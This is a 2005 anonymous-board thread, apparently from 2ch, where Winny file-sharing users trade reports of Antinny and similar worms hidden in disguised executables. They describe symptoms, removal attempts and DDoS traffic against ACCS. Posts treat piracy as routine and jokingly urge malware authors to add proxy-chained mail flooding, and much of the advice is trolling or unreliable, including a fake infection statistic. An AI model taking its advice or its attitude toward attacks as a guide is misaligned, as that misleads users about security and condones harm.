スタートアップの中に変なファイルはなかったんですが、そうじゃないのでしょうか?
>>149 ファイル名を指定して実行→「msconfig」と入力
そこのスタートアップ見てみ。
>>150 セーフモードでスタートアップを全て無効にしてから再起動したが駄目だったorz
checking file system on C:
the type of the file system is NTFS.
とかなんとか出てくるんだ
どなたか助けてくださいorz
何が怖いって 時 限 式 が 一 番 怖 い
怖いのは熱いお茶だ
>>152 >スタートアップを全て無効
ハゲワロスwwww
( ・ω・)つ且
皆がダウンしたファイルの中で正常のとウイルス入りが混じってる比率は? ・・・って聞こうと思ったけど、圧倒的にエロが多いよね? 音楽とか映像なんかは少ないでしょ? だから、聞き方を変える。エロばっかりダウンしてる人の中で、 ウイルス付きなのはどれぐらいの頻度で出ますか?
>>157 比率なんか聞いて何の意味があるんだ?
Winnyのような怪しい出所から落としたファイルは全てスキャンしてから拡張子確認して実行するだけ
俺は自分の美貌が怖い。あと才能。無いのは金だけ。
むしろエロの方が低いだろ。 拡散度合いだけじゃなく人気度も考慮すれば、 ジャンプ最新号とかリリースされたばかりのCDとかが狙われてるのは明白
>>158 その通りなんですが、ある程度参考までにお願い出来ますか?
>>159 美貌ですか…。羨ましいですね。
>>160 なるほど。ではやはり全体に聞くべきですかね?
皆さん面倒くさいかもしれませんが、数字を提示して頂けないでしょうか?
162 :
[名無し]さん(bin+cue).rar :05/02/25 12:03:50 ID:Uri2kC0y0
>>152 おまいのせいでディスプレイがコーヒーまみれになったじゃねーかw
>>161 ウイルスなし 47%
ウイルス入り 63%
これでまんぞくか?
>>164 満足しました。ありがとうございました。
>>89 > ところで全然関係ないんだけど、
> 我が家のウィニィがポート25を通して外部に接続しようとするんだが、
> これはウィルス?
> バスターでは反応しないんだが。
>
漏れもおんなじ症状。
ファイアフォールによれば、ウィニィからのマスメール送信(SMTP)。って何?
PC立ち上げたら、タスクにweb1bedとかいうのが 出てPC重くなるんだが、これってウイルス?
>>169 アリガト。
2〜3日、試しにほど使ったけど、怖いから使うのやめます。
みつをぬるぽってどんな症状なの?
>>168 それってさー、nyのポートを25番に設定してる奴がいて、
バスターのPFWがブロックしてるだけジャン。
nyのエラーログとPFWのブロックログがほぼ同時刻に
でてるはずだよ。
>>174 ・壁紙が相田みつお風味で「晒されたっていいじゃない 泥棒だもの ぬるぽ」
と書かれたものに変えられる
・スクリーンショットを撮られてマイドキュメントにあげられる
が主な症状だったと思う。詳しいことは忘れた。
俺もこれ感染しちまってさ、できるだけ対処したつもりだが今でも不安だ…
177 :
174 :05/02/25 16:41:18 ID:GfKavashO
>>176 情報ありがとう。んじゃ俺も感染したわ。
すぐ再インストルしたんだけど、やはりまだ不安。PCが不安定になった感がある。
みつをぬるぽ旬だな
空きがあるはずのHDDが満杯になってた 作業スペースがいるので、要らないデータを削除しようと中を見た 作った覚えのないフォルダに、山ほど.exeや.lzhやデスクトップの.jpgが なにか、様々な意味で色々と終わってしまったと思った瞬間であった… ああーっ、アンチウイルスソフト更新切れで放置するんじゃなかったー 思い起こせば数ヶ月前、フォルダのアイコンをしたexeを踏んだんだっけ その後、ny回りを見たけど変化無かったから「大丈夫」と思い込んだんだ regeditは細工されておらず、妖しい起動exeを外すと、再起動の度に、 CのユーザーTEMP下と覚えのないフォルダに作られていた、新しい 引っ掛け用ファイルが作られなくなった。とりあえずはこれでよし さぁ、もうちょっとしたらアンチウイルスソフトを買いに逝くか… ウイルスが書き換えたUpFolder.txtが別のソフトのファイルだったんで、 実際にデスクトップ画面はうpされてなかったようだ どうせデスクトップ画面じゃ俺様が誰か特定するのは不可能だし でも、コレが流れてたらと思うと、もんのすげーはずかしー
180 :
[名無し]さん(bin+cue).rar :05/02/25 18:02:08 ID:2S1QHUEV0
更新切れって何だ?
ny立ち上げたら、まるでつながらないから調べてみたら、初期ノードのあるはずのテキストファイルが真っ白になってた。 さらに、変なテキストファイルが作成されてた。 (null)Noderef.txtとかってのと、もう一個(null)何とかってテキスト(うろ覚え)ってのが。 なにかわかりますか? 木曜の夕方までは普通に使えたんだけど…
とりあえず、初期ノード登録しなおしたらまたつながったけど、不気味。
自己解決、ぐぐったらありますた。 バグみたいですね。
アホばっか
とニュイルス作者が申しております
.exeをクリックするのは玄人の専売特許ですか?
偽装にだまされるにはどうすればいいの?
拡張子表示→非表示に 詳細表示→アイコン表示に 変えたアイコン→デフォルトのアイコンに
winnyで音楽を落とす→確認もせずにCDに焼く→MDへ→聞く 『You are an idiot! ha-ha-hhahhaha-・・・』 ( ゚д゚)ポカーン そして2曲目は女の喘ぎ声・・・orz 黒毛和牛上塩タン焼680円じゃね〜のかよヽ(`Д´)ノ
だからなんだ
みつをぬるぽに感染した俺のPCのデスクトップ画面見て うちの姉貴がコーヒー吹きやがった・・
そんなお姉様に萌えた 写真upしたら助けてやらないこともないかもしれんぞ?
>>179 >アンチウイルスソフト更新切れで放置
ワラタ。
みつをウィルスやっちゃった。既出のデスノで。 旬のウィルス踏むのは初体験なんで新鮮w 一瞬血の気は下がったし、まだ海のものとも山のものともつかないので 不安ではあるけど……。 いまのとこ、うちも壁紙変更以外の被害はないし不審なファイルも みつからないです。 スレ汚しスマソ
*.me11po やられました・・・ どうもupfolder.ini書き換えでupられたようです。 あまり情報ないですね。このニュイルス・・・orz タシケテ
噂のみつおぬるぽの壁紙ってどんなの? 見たい
202 :
[名無し]さん(bin+cue).rar :05/02/26 10:54:20 ID:7OHw4aO60
欄検眼段のウィルスのかかってしまいました。 ウィルスバスターで検索しても見つかりませんでした。 直し方を教えてください
203 :
147 :05/02/26 11:29:43 ID:B43pWV+90
>>199 先日やらかした者です。
あの後、感染PCは感染後30分程度で気づいた後はネットワーク無効にして、必死こいて別PCでウイルスについて
調べましたが、みつをに関しては、ほかのキンタマのように、アップフォルダの自動生成とかレジストリ
いじりみたいのもぱっと見ない感じですよね。
これからOS再インスコします。バックアップファイルが汚染されてないことを願うのみです。
ユーザー名リアルネームのまま放置してたため、流れるとマジで凹みますorz
>>202 バスターを過信した君が悪い
あきらめて再インストールするがよろし
205 :
[名無し]さん(bin+cue).rar :05/02/26 12:07:06 ID:8Axj7XjJ0
その前に報告しとけ
ユーザー名リアルネーム&感染日時
207 :
179 :05/02/26 14:52:54 ID:RU60S3MD0
>>191 さん、どもです。アンチウイルスは最新のものでないと意味無しでした
先生のインターネットセキュリティパック買ってきて、
updateかけてウイルス定義を最新にしてからウイルスチェック
先ほど終わりました
c:\Program Files以下に、既存ファイル名+で潜んでたW32Antinny.Kが2本
レジストリに細工して、自動起動してたのは1本だけだったんだが…
2回引っかかったって事かなぁ
他にも(多分)発症していないウイルスがポコポコと
何と言うか、確証の無い「大丈夫だろ」な思い込みって怖いっす
圧縮ファイルを解凍前にスキャンして検疫すれば全く問題無いよね?
>>208 このスレ及び過去スレ全部読め
アンチウイルスを過信するなと何度言えば分かるのか
君も律儀だな
211 :
195 :05/02/26 17:11:51 ID:Yogpgu/e0
>>196 うちの姉の写真ですか・・
やめときな、あれはグロ画像だ。
>>196 はグロ画像掲示板の住人かもしれないじゃないか。(w
213 :
[名無し]さん(bin+cue).rar :05/02/26 18:58:47 ID:k8NNIkpb0
うちのノートン先生が2002だから買い換えようと思うんだけど マカフィーとこのままノートンどっちがいいかな?
215 :
[名無し]さん(bin+cue).rar :05/02/26 19:16:42 ID:Kl2K32W20
っきゃろーーー
にゅいるすなんてなってっから
検索かかんなかったじゃねーかああ
っきゃろーーーー
>>213 pれマカフィーはやめとけ
まだ懲りないの?.bmp(オロナミンCの宣伝みたいなの) といっしょに流れてるフォルダ偽装exeって、解析されてるんだっけ? いや、先生は反応しないのだが.....壁紙変更ワームなのかね
>219 ワロス
そして俺は何をミスったのか未だに理解できていない(`・ω・´)
218のは最後に余計なスペースがある
先日、ウイルスに感染してしまった・・・・・・。 感染した時、上戸綾のオロナミンCのCMを模倣した画像が、画面いっぱいに広がったんだけど、 これはどのキンタマウイルスなのか、教えて下さい。
∧,,∧ (;`・ω・) 。・゚・⌒) チャーハン作るよ!! / o━ヽニニフ)) しー-J アッ! 。・゚・ ∧,,∧ て 。・゚・。・゚・ (; ´゚ω゚)て // / o━ヽニニフ しー-J 彡 ∧,,∧ て (;´・ω・)て ・゚・。・ ゚・。・゚・ 。・゚・ / o━ヽニニフ)) <○√ しー-J. ‖ オレが止めているうちにチャーハンを戻せ! くく でも・・・、君が火傷しちゃうよ・・・ ∧,,∧ (;´・ω・) / o━ヽニニフ)) ・゚・。・ ゚・。・゚・ 。・゚・ しー-J. <○√ 早く!早く!オレに構わず戻せ! くく ∧,,∧ て チャーハンー!! (;´・ω・)て / o━ヽニニフ)) しー-J. グシャ ・゚・。・ ゚・。・゚・ 。・゚・
naoのこと時々でいいから思い出してあげてください
NaturalAnotherOne
227 :
[名無し]さん(bin+cue).rar :05/02/27 01:53:10 ID:/Qp6bH6r0
失礼します。 【使用OS】WindowsXP HOME SP1 【WindowsUpdateしてるか】している 【使用AntiVirusソフト】ノートンアンチウィルス2004 【AntiVirusをUpdateしてるか】している 【ウイルススキャンの結果】検知せず 【オンラインスキャンしたなら結果】トレンドマイクロベースのオンラインチェックにて検出せず 【Winnyのバージョン】2.0b7.1 【Winny歴、総DL量】1年半 100GB 【テンプレを読んだか】事後に読みました。(踏んだのは今回が初) 【テンプレにある対策を実行したか】今回は全く無警戒でした。 【症状、具体的に分かる限りすべて書く】実行後2時間近く経ちますが症状がありません。 【何をしたらそんなことになったのか】解凍したフォルダ内に存在していた偽装フォルダをダブルクリック。 【これまでにとった措置】 まず、起動していたプロセスを強制終了。次にウィルスチェックをかける。 ここで検出されなかったため、オンラインスキャンを実行。またも検出されず。 このスレッドに書いてあった症例に習い、同じような症状が無いか点検してみるも、合致するものが無し。 あとはもう一度問題のファイルを開いて、プロセスの中身を調べてみれば手がかりはあるんでしょうけど、 その勇気がないというか、踏ん切りがつかず。結局何の変化も認められないので、戸惑うばかりです。 ファイルの作成日が2001年1月1日 0:00:00という点から、何らかの愉快犯的ウィルスだと思われるのですが…。 ああ、寝ようと思った矢先に不用意な事をしました。。反省してます。どなたか、助言いただけないでしょうか。
228 :
[名無し]さん(bin+cue).rar :05/02/27 02:15:04 ID:/Qp6bH6r0
進展がありました。 自身のコピーを作成してはいないかと思い、 元ファイルのデータ容量を手がかりに検索してみたところ、 見事にヒットしました。 問題のファイルはノートンアンチウィルスのフォルダ内、 数列で名称表記されたEXEファイルの一つとして紛れていました。 で、これは自分の見落としがあるな、と思い、スタートアップ項目をチェックしたところ、 シマンテックの起動ファイルだと思い一時的にスルーしていたものの中に同名の値を発見。 直ちに削除しました。 とりあえず、ウィルスは根絶できそうです。 どこかに伏兵が潜んでいなければですが(汗 このような挙動を取るウィルスに関して、 何かご存知の人いましたら情報をください。 お願いします。
アンチウイルスで検出できない新種ならば、ファイル名・ハッシュ書いてくれ
230 :
ひみつの文字列さん :2024/12/23(月) 19:51:56 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
231 :
[名無し]さん(bin+cue).rar :05/02/27 02:28:21 ID:/Qp6bH6r0
あ、もちろん一度解凍処理を行わせて、ですが。 exeかどうかを名前で判断しようとすると、自分は多分忘れるので(汗) なるべく行動ルーチンの段階で予防しようと思ったんですが。。 眠気が最大の敵ですね。ほんとに。 もう眠気なんてぶっとびましたけど。 ダラダラ長く書き込みました。スイマセン。
232 :
[名無し]さん(bin+cue).rar :05/02/27 02:38:39 ID:/Qp6bH6r0
また見つけましたorz 今度はヤフーメッセのフォルダに紛れている奴です。 フォルダが開かないと思って二度ほどダブルクリックしたんですが、 どうやらランダムで滞在先の見つかったフォルダに自分をコピーしていた模様。 どういう挙動をするプログラムなのか分からないんですが、 タスクの予約状況など見ながら恐る恐る対処する方針です・・ガクガク
>>232 いまそうやって書き込んでるマシンは、もちろん感染してない別の
マシンだよな? 挙動不明のウイルスが活動してるマシンでオンラ
インにしてるかと思うと、読んでるこっちがガクブルするんだが。
>>232 少しおちつけよな!
http://tmp4.2ch.net/test/read.cgi/download/1108710633/ 911 :[名無し]さん(bin+cue).rar:05/02/27 01:10:31 ID:/Qp6bH6r0
(シングル) トップをねらえ2! OP - ROUND TABLE Featuring Nino - Groovin’Magic (192k).exe
というエグゼファイルを誤ってダブルクリックしてしまったんですが、
ウィルスチェックには無反応で、キンタマかと思い諸所の例にならって検索してみたんですが、
それらしい痕跡も何も無いんです。
ただ、複数同時に起動する事が可能らしく、プロセスにも表示されます。
ただ、何をするのが目的のウィルスなのかが不明で。
これに関して何かご存知の方いませんか?
なまじ知識あると未知のウィルスの感染による被害や駆除法であれこれ頭が混乱して 偉い動揺してまうって感じか
新種ならノートンとバスターに提出しておいてください
アホばっか
238 :
[名無し]さん(bin+cue).rar :05/02/27 17:35:11 ID:Fo51ZuBY0
A列車4実行したら BOOTSTRAP ボタン「実行します」 って出たんだけどコレってウイルス?
心配するな。 手遅れだ。
240 :
[名無し]さん(bin+cue).rar :05/02/27 17:40:26 ID:Fo51ZuBY0
ガボーン
ガボーンという擬音には心なしかセンスを感じるな。
242 :
[名無し]さん(bin+cue).rar :05/02/27 17:52:03 ID:v7TV2IPs0
XP標準搭載のマカフィーでスキャンする場合ぬるぽって検出されますか?
最近のXPにはマカフィーが標準搭載なのか。そうなのか。
244 :
[名無し]さん(bin+cue).rar :05/02/27 20:06:18 ID:/Qp6bH6r0
なんかここの人って何の役にも立ってくれませんね…。 とりあえず自己解決したので報告だけしておきます。 お邪魔しました。
よかったな。
246 :
[名無し]さん(bin+cue).rar :05/02/27 20:12:36 ID:XnhvOGFS0
解決できたのか このスレさまさまだな
匿名掲示板のこんな板にあるスレなのに 相談すればなんでも教えてくれるのがあたりまえと思ってる >244はなかなか愉快な子だなと思った
248 :
[名無し]さん(bin+cue).rar :05/02/27 20:17:45 ID:/Qp6bH6r0
まあ、さしずめここは石っころの集まりってとこだよね。 ロクでも無いとこに相談したんだと、今振り返ると恥ずかしいよ。 我ながら、かなりテンパってたっぽい。
>>248 何の役にも立たなくてごめんね。
でもお前は役に立たないどころか見てて不快だよ。
>>247 に同意。
生じたトラブルを自己責任で解決することができないなら端からnyなんて使うなということ。
独り善がりの文章で他人に情報提供する意図が無いようでは、誰も読まないしレスもつかない。
251 :
[名無し]さん(bin+cue).rar :05/02/27 20:24:39 ID:/Qp6bH6r0
ムキになって反論しちゃって大変ですね^^;
ID:/Qp6bH6r0はただの池沼じゃなくて、244以降はハクられて踏み台にされてるって話なら面白いんだけど... やっぱただの池沼だな。つまらん。
詳細な報告したのに相手にされない上にマルチまで晒されたからって、 それをここで晴らすのは大人げないな。その憤りはウイルス作者に向 けられるもんだろうし、自分にも非があったって書いてたじゃないか。 自己解決したならその手法を報告することで、これ以降の被害者を救 うことにも繋がるし、このスレ的にも建設的な方向に進むと思わない か?
釣りのAA誰も貼らないでやんの(・ε・) チェッ
それさえもバカバカしぃ、ってことよ。
まじめに反応した俺がバカみたいじゃん。(´・ω・`)
―――――――――ここまでテンプレ――――――――――
259 :
[名無し]さん(bin+cue).rar :05/02/28 00:18:53 ID:uUFN2kMF0
【使用OS】 windows95 【WindowsUpdateしてるか】 してない 【使用AntiVirusソフト】 持って無い 【AntiVirusをUpdateしてるか】 当然してない 【ウイルススキャンの結果】 だからしてない 【オンラインスキャンしたなら結果】 かからない 【Winnyのバージョン】 2 【Winny歴、総DL量】 2年 【テンプレを読んだか】 読んだ 【テンプレにある対策を実行したか】 した 【症状、具体的に分かる限りすべて書く】 なんか動作が重い 【何をしたらそんなことになったのか】 画像の圧縮ファイルだと思ったらEXEだった 【これまでにとった措置】 とりあえずスタートアップ大幅規制 あとは放置 どうすればいいんですか
windows95でWinny?
【使用AntiVirusソフト】 持って無い 【AntiVirusをUpdateしてるか】 当然してない 【ウイルススキャンの結果】 だからしてない その開き直り具合はあっぱれだな。 【テンプレにある対策を実行したか】 した ただし、ウソはいかんよ。
亀仙人のジッちゃんがどうのこうのって内容のtxtファイルが 同梱されてくるやつってantinyの亜種?新種? 割と見かけるけどテンプレの「流行種」には含まれてないみたいなんだが。
前スレの偽装解除.bat踏んだ者だが、新たに症状発見。 adobe関連のソフトがごっそり削除されてる。 以上報告でした。
落としたPhotoshopあぼーん
ゲームファイルでbinとcueとかを デーモンツールでシフト押しで自動実行しないで開いた その中のinstaller.exeはウイルススキャン以外何か必要?
>>264 俺も偽装解除.batを踏んだけど、同じくアクロバットが消えていたよ。
それ以外にもB's RecorderとCanonのプリンタ付属ソフト、アルバムソフトが消えていた。
どうやらC:\Program Filesのアルファベット順から消されていったみたいだな。
268 :
[名無し]さん(bin+cue).rar :05/02/28 08:13:28 ID:DDT//won0
nyやってるとFWのアタックのログが結構ある
アホばっか
【使用OS】 windowsXP Pro 【WindowsUpdateしてるか】 してない 【使用AntiVirusソフト】 AVG eTrust 【AntiVirusをUpdateしてるか】 二、三日に一回はチェックしてる 【ウイルススキャンの結果】 antiny.jとantinny検出 【オンラインスキャンしたなら結果】 ↑をした後、菌入り圧縮ファイルを削除したら何も検出されず 【Winnyのバージョン】 2 【Winny歴、総DL量】 4年 【テンプレを読んだか】 読んだ 【テンプレにある対策を実行したか】 した 【症状、具体的に分かる限りすべて書く】 特にない 【何をしたらそんなことになったのか】 菌入り圧縮ファイルをキャッシュから変換後 意味不明の文字列とファイル名が入ったボップアップが出現 詳細は覚えていない。eTrustが反応したのかなと思ってeTrustを誤動作させてみたけど eTrustの反応とは違ったので何か不明 【これまでにとった措置】 菌入りファイルを削除、まとめサイト読んで対策→特に何も見つからず 自分が感染しているのかしていないのかが不安です 何でもいいんで心当たりとかあったら助かります 再インスコは最後の手段にしたい
>>270 ポップアップが出たのに詳細を覚えていないってのは痛い。
ワクチンログにしろウイルス活動にしろ、そこから解決の糸口を
見つけることができるかもしれんのに。
AVGのログにそれらしき形跡が残ってないかチェックしろ。
新規インスコは最後の手段だが、最も効果的な手段でもあるから
ためらいも捨てろ。
4年もnyやってるなら、 感染した時の状況は冷静に確認してほしいもんだ
総DL量ってみんな偽ってないか? 500Gとか1Tとか、いると思うんだが・・・
【使用OS】 windows2000 SP4 【WindowsUpdateしてるか】 した 【使用AntiVirusソフト】 Mcafee VirusScan 【AntiVirusをUpdateしてるか】 最新にアップデート済み 【ウイルススキャンの結果】 検出されず 【オンラインスキャンしたなら結果】 【Winnyのバージョン】 なし 【Winny歴、総DL量】 なし 【テンプレを読んだか】 読了 【テンプレにある対策を実行したか】 一応チェックしてみた 【症状、具体的に分かる限りすべて書く】 女性の画像が表示→マイドキュメント削除 【何をしたらそんなことになったのか】 ボボボーボボーボボを騙ったzipファイル内に、フォルダ偽装したexeがあったのでそれを実行 【これまでにとった措置】ウィルスチェック、スパム系のチェックレジストリ、スタートアップの確認、その他報告されているフォルダのチェック。 当方winnyをやってないけど、ジャンプ速報スレで妙に釣れてたんでキンタマ関連を実行するとどうなるのか興味があったので、試しにテスト機で実行してみた。 ヘルプというより報告でつ。テンプレにあるのと微妙に違う動きだったので。 実行すると、女性の画像が表示されて、しばらくタスクマネージャが起動不能。しばらくすると起動できるようになるが、マイドキュメントの内容が削除され、別のフォルダに割り当てられていた。 ウィルスチェックしてみるも該当なし。 スタートアップ変化なし。レジストリの例のRunの下、変化なし。C:\Winnt\bugfixは空っぽ。c:\winntに妖しげなファイルはなし。 そんなわけであまり面白くない結果になった。今後どうなるか気になるので、放置してる。何か変化があったらまた報告しまつ。
人柱乙
277 :
[名無し]さん(bin+cue).rar :05/02/28 16:31:00 ID:uUFN2kMF0
ここって結局どういうスレなの?
作者が見てニヤニヤするスレ
>>278 あ、なるほど。
なんか質問テンプレとかあってもロクなレスがついて無いし、
どうも変なスレだなーと思ってたけど、そういう事だったのね。
レス付けてる人が初心者に毛が生えた程度だなって感じがしたのは、
皆さんそういう感じで適当に答えていたからだったのか。
あ、ちなみに259で試しにレスしてみてます。 もちろんネタですが(笑) なんか、皆さん答え安い質問に、初心者でも分かるような解答しか寄せてないですもんね。 あれはワーム等の対策としてこのスレを立てたわけじゃなくて、 引っかかって困ってる人を見てニヤニヤするのが目的で立てたから、だったんですね。 マジこのスレ面白いです(笑)
ゴット級マダァ?
とっとと新しいやつ流せよ糞作者
>>270 キャッシュから変換しただけだったら大丈夫なんじゃないかな?
スレタイを見ればわかるように、ここはウィルスの情報を挙げるスレであって 対策法を教えるスレではないのだから、誰もマトモに答えてないだけだろ。
285 :
[名無し]さん(bin+cue).rar :05/02/28 19:30:54 ID:3/zWeRnZ0
ACCS、DDoS攻撃への対策でIPアドレスの記録を開始
http://www.rbbtoday.com/news/20050228/21264.html コンピュータソフトウェア著作権協会(ACCS)は、DDoS攻撃への対策として
3月からwww.accsjp.or.jpにアクセスしたIPアドレスを記録すると発表した。
ACCSは、1月21日に公式サイトのWebサーバをwww.accsjp.or.jpからwww2.accsjp.or.jpに変更している。
これは、www.accsjp.or.jpに大量のパケットを投げる「Antinny」などのウイルスに
感染したコンピュータからのDDoS攻撃を防ぐために行われたものだ。
そのため、現時点でwww.accsjp.or.jpにアクセスするIPアドレスは、
Antinnyなど不正なソフトウェアが実行されていると判断。
過度のアクセスがあるIPアドレスを記録し、該当するISPなどを通じてユーザに注意を促す。
注意されて気づく感染
>>284 それ、認識間違ってますよ。
スレタイ・テンプレをまともに受け止めればそうはならないハズ。
逆にこのスレの真の意味(感染者を見てニヤニヤ)を知っていれば、
なお当然できない認識なんですが。
自分ルールで都合のいい解釈をしないでくださいね。
(・∀・)ニヤニヤ
僕らはいつも疑心暗鬼
アホばっか
Antinnyなどとは言うが、元祖Antinnyはパケット出さないのにね メール砲搭載してるのは、キンタマだというのに。 ACCSなど不正な団体へのアクセスに十分注意するように勧告した
オランゲランゲ
作者の方は、海外串多段でメール砲打つような仕組みを取り入れてくれ。 と煽ってみるテスト
ああ、人工頭脳学な症候群あたりで有効な串リストを自動更新するとかな。
アホばっか
なんだよ人工頭脳学な症候群って。 頭オカシくない?
cybersyndrome
人工頭脳学はサイバネティックだろ。 単に頭が悪いだけのアホかよ、ツマンネ。
cyberは「最新の」だな。
「症候群、串リスト」とくればcybersyndromeだと思ったが、人工頭脳は知らん。
ニュイルス作者を刺激するのはやめてください
それではニャームの作者を刺激するとしよう
ニョロイは?
ニャニュニョの分類基準がわからん
ただの語感。
ア行→ニャ 例:ワーム ウ行→ニュ 例:ウイルス オ行→ニョ 例:トロイ 俺は使いやすいニャックドアが出回ってくれるとおもしろいかなーとか。
じゃ、みんなひっくるめてニャルウェアってことで。(w
ニョロイのニョク馬 どうでもいいが「にょろ」で検索すると「〜」が出てきてビビッた
310 :
309 :05/03/01 11:58:45 ID:yfaWdQ6b0
変換の間違いです
にょろを変換すると〜になるのって誰が始めたんだろうなあ。 へびっぽいからだろうか。
イヤソウジャナクテ ニャームとニョロイの違いを・・・
ニョートンニャンチニュイルス
ついかっとなってwww.ac●sjp.or.jpにアクセスしてみた 〜〜〜〜何もない〜〜〜〜 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META http-equiv=Content-Type content="text/html; charset=shift_jis"></HEAD> <BODY></BODY></HTML> www2への臨時移転案内ぐらい入れないのかね?>ここを見てるAC●Sの諸君! これじゃただのフィッシングサイトだろーが
そいえばaccsにアタック多いのでウンヌン言ってたが、単にツーホーcgiを 動かせば、何度も何度もアクセスするわけではないし、そのメアドに「ニュイ ルスチェク汁」と返信すればいいだけの気がするのだが、なぜわざわざ アタック食らうような真似するかね? 久保がうちは攻撃されている被害者だと言いたいだけかヽ(´ー`)ノ
316 :
定期レス :05/03/01 20:42:15 ID:3o2b60tq0
アホばっか
317 :
[名無し]さん(bin+cue).rar :05/03/01 21:33:14 ID:ODP+PiIxO
WINDOWS2000を使っているものですが、ウイニーを二ヶ月前くらいからやりだしたので不安に思い、ウイルスバスター2005でウイルス検索しようとしたらすぐにウィンドウが勝手に閉じてしまいます。 いつも落とすときはリアルタイム検索設定をしていたと思います。これってウイルスでしょうか?
318 :
317 :05/03/01 21:37:40 ID:ODP+PiIxO
携帯で見てたので1しか読んでいませんでした。すみません。とりあえずウインウズアップデートとウイルスバスターは最新版です。FWはウイルスバスターのを切っていました。
トリガーキター
>>315 ACCSにe-mailを送っているわけではない。
>>320 ツッコんじゃ悪いよ。
最近このスレってああいうのばっかりなんだから…。
322 :
317 :05/03/01 22:10:21 ID:ODP+PiIxO
お願いします
323 :
[名無し]さん(bin+cue).rar :05/03/01 22:28:05 ID:UlVA7uur0
ハナハルさんの作品集というファイルを削除しょうとしたら、 explorer.exeがエラー終了してしまいます。情報を見ると、 C:\DOCUME~1\Owner\LOCALS~1\Temp\f7af_appcompat.txt とあったので、キャッシュと履歴をクリアーしましたが、直りません。 これはウイルスなのでしょうか? どうか対策方法を教えてください。お願いします。
ニュイルスの方が釣り人多いな
アホばっか
欄検眼段なんだけど害はあるの?
おやおや、今度はウイルス本体様のお出ましだ。コンニチハ!
イベントでみたら Windows Installer (Nullpo) となってました。 なんのウィルスですか?
パソコンのウィルスです
331 :
長文 :05/03/02 08:20:45 ID:+IoPy++70
オイラのPCには2.0対応のUSB口が4っつあるんだが、どの口にUSB2.0対応の製 品をつなげても、不明のデバイスですって事で認識されなくなった。2.0対応の 4ポートハブ、USBフッラシュメモリ、USB外付けハードディスクなども全部、 タスクマネージャなどをいじったりしてもなおらなかった。ちょっと前に、 Winnyやってたのでニュイルスか?と思い、再インストールすることに、でも PCに残ってる40Gぐらいのデータ物を移す物がない・・・。外付けHDDも使え ないし、しかし思わぬことに、USB1.0のみの対応したハブや、メモリとかは 認識し使えることが判明、また1.0のハブにその2.0外付けHDDをつなげると、な ぜか使えることも判明,でも転送速度は1.0だけど、そのため40G移すのに 11時間もかかった。でPCのHDDを初期化OS再インストールし、再び2.0対応 製品をつなげたら、それでも認識されなかった・・・。ショックでもうPCを 買い換えるかなと考えたけど、とりあえずケースを開けて、マザーにつなが ってるUSB口をちょっとふいたり、全体的にもっさりほこりがついてたので、 内輪ではたいたり、吹いたりして取り除いた。でもう一度、駄目もとでやっ つなげたら、今度は、2.0対応がちゃんと認識した、おお!こんな物理的 なやり方で回復するとは・・、原因がよくわからなかった。
( ´,_ゝ`)プッ
test
ZIPを解凍したらWin32/Parite.Aというウィルスが出てきたんですが これって解凍しただけで感染することはあるんですか?
338 :
335 :05/03/02 13:36:09 ID:NH9DiMUp0
とりあえず大丈夫ってことですか?連投すいません
>331 「中だしwwwだめぽwwwwwwwwwwwwwww」まで読んだ
340 :
[名無し]さん(bin+cue).rar :05/03/02 17:43:26 ID:rr3stMW50
アホばっか
マホメット
マスカット
今 なんかWinnyやってダウンしたもの を整理してるんですが、 なんかハードディスクの書き込み音がガガガガ鳴ってます。
好きなだけ鳴らせばええがな
ガガガ
OK、ブラクラゲット。 ∧_∧ ∧_∧ (´<_` ) 流石だよな俺ら。 ( ´_ゝ`) / ⌒i / \ | | / / ̄ ̄ ̄ ̄/ | __(__ニつ/ FMV / .| .|____ \/____/ (u ⊃ ガガガガ・・・・
マイクロソフトの Windowsの更新でした。^^;
自動更新なんか切れ。
なにこのネタスレ
351 :
[名無し]さん(bin+cue).rar :05/03/02 23:48:05 ID:U2Qf+mUc0
mellpo.exeって結局何がしたかったんだろう・・・ 勝手に強制終了してしまったのだが・・・
ふむふむ、アプリケーションエラーのダイアログで偽装すれば 感染者は油断するのか
ワラタ そういえば解凍エラーのダイアログなんてのもあったな
最近携帯の電池がすぐになくなるんですけど、やっぱりこれもニュイルスのせいですか?
俺は携帯用ノートン入れてるから大丈夫
俺携帯もってないから大丈夫
モッテテモカカッテコナイ('A`)
ネタ(新規ニュイルス)が投入されない以上は、ネタスレと化しても仕方なし。 ま、マターリといきましょうや
kakikomi.txtをうpするキンタマまだかな
モッテテモカケラレナイ('A`)
ニュイルスを変換すると乳井留守になるんですけどこれもニュイルスの所為ですか?
>>363 乳井留守 ホントだ・・・バスターでもニュイルスは防げなかったか
ことえりは普通にニュイルスって変換したよ。
乳井留守 うわぁぁぁぁぁぁぁ!!ノートン先生ぇぇぇぇぇぇ!!
ニュイルス 普通に変換された
DLLファイル全滅か・・・。再インストールメンドクセー・・・。
そもそも『乳井』ってなんだろう。
乳井さんて苗字あるよ
(・ω・ )居留守
(・ω・ )=にゅ ???
作者さん、こいつらに煽られてますよ!
にゅ居留守
New居留守
うにゅう?
エロ集めをしていたらファイル検索で 欄検眼段_C_なんとかかんとか ↑ ↑ ドライブ名? ファイルの名前 ってのが大量にあるが、これって新種のキンタマなの?
60HEmEokEqのしか無い
379 :
377 :05/03/03 22:01:28 ID:/qu6LgbY0
>>378 あら、本当だ。ウィルス情報を問うたつもりが、俺が自分の性癖を暴露しただけなのか・・・・
ある意味キンタマ
トレンドマイクロの海外サイトの無料、オンライスキャン及び駆除 サービスが終わってしまった。 いままでウイルス対策ソフトを入れてないオイラは もうWinny使えなくなった。 一回でもかかればアウトだもんな〜。
ノート買い換えたらマカフィーだったんだけど ノートンも買って併用すべき?
ウイルスバスター2005検出NGです。 中身EXEなので怖い、情報求む。 HDDフォーマット系(MZnullpo)です。 [アプリ] シリアル集 - Les Clefs d'Or 2005年03月01日版.zip t5b1S93MTo 1,222,775 ef6aff13b0f13913f856d58ece9e4fe2 日本製見たい。 ファイルのオフセット、ゼロに設定する範囲の開始点 Microsoft Corporation 使用法 : fsutil usn readdata <ファイル名>
>383 答え出てるんじゃないのか・・? >ウイルスバスター2005検出NGです。
>>384 感染した人が居たら詳しく聞きたい。里や耐え酒乱SEX
なんかノートン先生が検出しないキンタマハッケソ('A`) 2004で最新パッチまで当ててるんだが何故だ。新亜種? 2005もインストしてないが持ってるけど新種だったら意味ないから当面様子見
